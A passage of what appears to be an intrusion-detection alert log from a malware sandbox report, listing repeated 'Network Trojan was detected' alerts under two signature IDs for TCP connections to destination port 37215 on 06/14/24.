                SID:2835222
                Source Port:59754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472372
                SID:2829579
                Source Port:48320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244489
                SID:2829579
                Source Port:35534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879329
                SID:2835222
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181713
                SID:2835222
                Source Port:46654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.068895
                SID:2829579
                Source Port:34914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517929
                SID:2835222
                Source Port:39116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862322
                SID:2835222
                Source Port:33420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805628
                SID:2829579
                Source Port:56554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134666
                SID:2829579
                Source Port:50932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148842
                SID:2835222
                Source Port:40374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020900
                SID:2835222
                Source Port:48604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410959
                SID:2829579
                Source Port:45154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115463
                SID:2829579
                Source Port:54704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045901
                SID:2835222
                Source Port:44884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726481
                SID:2835222
                Source Port:54706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012593
                SID:2835222
                Source Port:38478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779929
                SID:2835222
                Source Port:38470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277067
                SID:2829579
                Source Port:36412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291141
                SID:2829579
                Source Port:57360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450218
                SID:2829579
                Source Port:39752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503487
                SID:2835222
                Source Port:34362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804976
                SID:2829579
                Source Port:47990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717867
                SID:2829579
                Source Port:50406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988149
                SID:2829579
                Source Port:46002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916616
                SID:2835222
                Source Port:41902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470907
                SID:2829579
                Source Port:51300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971337
                SID:2835222
                Source Port:53778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365322
                SID:2829579
                Source Port:34916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813478
                SID:2835222
                Source Port:54008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669674
                SID:2829579
                Source Port:49978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917679
                SID:2829579
                Source Port:55566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227898
                SID:2829579
                Source Port:59106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759351
                SID:2835222
                Source Port:50086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941620
                SID:2835222
                Source Port:58688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.334735
                SID:2835222
                Source Port:50168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672868
                SID:2835222
                Source Port:36776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967310
                SID:2829579
                Source Port:38122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718343
                SID:2829579
                Source Port:36058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021690
                SID:2829579
                Source Port:54464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998206
                SID:2835222
                Source Port:56602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517797
                SID:2835222
                Source Port:40562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115533
                SID:2829579
                Source Port:47736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549395
                SID:2835222
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759000
                SID:2829579
                Source Port:59488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544404
                SID:2829579
                Source Port:46760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762143
                SID:2835222
                Source Port:51544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277584
                SID:2835222
                Source Port:43760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677263
                SID:2829579
                Source Port:58090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202708
                SID:2829579
                Source Port:45624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245984
                SID:2835222
                Source Port:58190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014658
                SID:2835222
                Source Port:49842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766784
                SID:2829579
                Source Port:36360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027676
                SID:2829579
                Source Port:45302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859140
                SID:2829579
                Source Port:48166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702550
                SID:2829579
                Source Port:57784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625043
                SID:2829579
                Source Port:59802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342052
                SID:2835222
                Source Port:47552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131679
                SID:2829579
                Source Port:54738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669302
                SID:2835222
                Source Port:59850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449656
                SID:2829579
                Source Port:42294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704189
                SID:2829579
                Source Port:60006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019316
                SID:2835222
                Source Port:60066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520668
                SID:2829579
                Source Port:45170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772213
                SID:2835222
                Source Port:50128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075171
                SID:2829579
                Source Port:53576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245520
                SID:2829579
                Source Port:44962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804308
                SID:2829579
                Source Port:56474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943423
                SID:2835222
                Source Port:33604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381307
                SID:2835222
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763074
                SID:2829579
                Source Port:52064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501600
                SID:2835222
                Source Port:39856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110947
                SID:2829579
                Source Port:39854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013947
                SID:2835222
                Source Port:51370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777602
                SID:2835222
                Source Port:56806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563016
                SID:2835222
                Source Port:48880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716546
                SID:2835222
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718726
                SID:2829579
                Source Port:33376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421932
                SID:2829579
                Source Port:55028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662882
                SID:2829579
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033904
                SID:2835222
                Source Port:52616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812760
                SID:2835222
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831115
                SID:2835222
                Source Port:40712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880170
                SID:2829579
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151081
                SID:2829579
                Source Port:57632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383409
                SID:2829579
                Source Port:52036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761460
                SID:2835222
                Source Port:38890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810027
                SID:2829579
                Source Port:49196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647017
                SID:2835222
                Source Port:44066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765839
                SID:2829579
                Source Port:35520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135112
                SID:2835222
                Source Port:44698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276249
                SID:2829579
                Source Port:51700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.580628
                SID:2829579
                Source Port:43158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717681
                SID:2829579
                Source Port:58656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424792
                SID:2835222
                Source Port:58584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683558
                SID:2835222
                Source Port:40154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326228
                SID:2829579
                Source Port:35438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978215
                SID:2829579
                Source Port:49912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862446
                SID:2829579
                Source Port:58110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808912
                SID:2829579
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183628
                SID:2835222
                Source Port:60138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917585
                SID:2835222
                Source Port:35354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244805
                SID:2829579
                Source Port:53240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879873
                SID:2835222
                Source Port:39448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735331
                SID:2835222
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830042
                SID:2829579
                Source Port:53140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716112
                SID:2829579
                Source Port:49334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761431
                SID:2835222
                Source Port:38506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293068
                SID:2835222
                Source Port:33046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149483
                SID:2835222
                Source Port:59342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546274
                SID:2829579
                Source Port:39220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941916
                SID:2829579
                Source Port:60568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409600
                SID:2829579
                Source Port:41538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074962
                SID:2829579
                Source Port:42058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340583
                SID:2835222
                Source Port:49778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521576
                SID:2835222
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014623
                SID:2835222
                Source Port:47032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966209
                SID:2835222
                Source Port:45490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.335331
                SID:2829579
                Source Port:58460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662967
                SID:2835222
                Source Port:54224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618791
                SID:2835222
                Source Port:35712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857641
                SID:2829579
                Source Port:39754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245479
                SID:2829579
                Source Port:52682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969714
                SID:2835222
                Source Port:40578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943760
                SID:2835222
                Source Port:44638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073179
                SID:2829579
                Source Port:39880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422140
                SID:2829579
                Source Port:56388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365942
                SID:2835222
                Source Port:34994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408080
                SID:2835222
                Source Port:35780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724389
                SID:2835222
                Source Port:37898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052969
                SID:2829579
                Source Port:33328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977159
                SID:2835222
                Source Port:42984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152146
                SID:2829579
                Source Port:40162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094401
                SID:2835222
                Source Port:59270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699343
                SID:2829579
                Source Port:58072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423405
                SID:2829579
                Source Port:44898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671500
                SID:2829579
                Source Port:52156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831635
                SID:2829579
                Source Port:55974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520569
                SID:2835222
                Source Port:58920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828948
                SID:2835222
                Source Port:37132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452635
                SID:2835222
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624449
                SID:2829579
                Source Port:51886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645611
                SID:2835222
                Source Port:47108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766740
                SID:2835222
                Source Port:35574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199854
                SID:2835222
                Source Port:33518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563545
                SID:2829579
                Source Port:53626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092066
                SID:2829579
                Source Port:50202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763136
                SID:2829579
                Source Port:34130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641352
                SID:2829579
                Source Port:53640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133581
                SID:2835222
                Source Port:50892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521688
                SID:2829579
                Source Port:41182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941180
                SID:2835222
                Source Port:48696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277330
                SID:2829579
                Source Port:40132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705144
                SID:2835222
                Source Port:35070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811288
                SID:2829579
                Source Port:41976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227858
                SID:2835222
                Source Port:39284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186403
                SID:2835222
                Source Port:50130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998238
                SID:2835222
                Source Port:46096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149452
                SID:2829579
                Source Port:38430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365096
                SID:2829579
                Source Port:57828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879223
                SID:2829579
                Source Port:54038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943730
                SID:2829579
                Source Port:57222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728142
                SID:2835222
                Source Port:59850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344411
                SID:2829579
                Source Port:37516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338264
                SID:2829579
                Source Port:50550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684423
                SID:2835222
                Source Port:46152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015359
                SID:2829579
                Source Port:40548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829432
                SID:2829579
                Source Port:37380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682788
                SID:2835222
                Source Port:39594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244400
                SID:2829579
                Source Port:43710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944028
                SID:2829579
                Source Port:38570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253474
                SID:2829579
                Source Port:58182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407184
                SID:2829579
                Source Port:44006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616385
                SID:2829579
                Source Port:48020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803612
                SID:2829579
                Source Port:50034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847842
                SID:2835222
                Source Port:51020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861895
                SID:2835222
                Source Port:43724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678640
                SID:2829579
                Source Port:49032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968582
                SID:2829579
                Source Port:39128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029329
                SID:2829579
                Source Port:34776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381098
                SID:2829579
                Source Port:37108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701809
                SID:2835222
                Source Port:47366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705050
                SID:2835222
                Source Port:45024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545577
                SID:2829579
                Source Port:46750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702172
                SID:2829579
                Source Port:54370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830238
                SID:2829579
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915713
                SID:2829579
                Source Port:52976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732903
                SID:2829579
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978171
                SID:2829579
                Source Port:41088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367736
                SID:2829579
                Source Port:34948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367456
                SID:2829579
                Source Port:44426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985484
                SID:2835222
                Source Port:50692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151829
                SID:2829579
                Source Port:33110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717290
                SID:2835222
                Source Port:48576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759943
                SID:2829579
                Source Port:55316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149934
                SID:2835222
                Source Port:49012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678194
                SID:2829579
                Source Port:58330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618009
                SID:2829579
                Source Port:56442
                Destination Port:37215
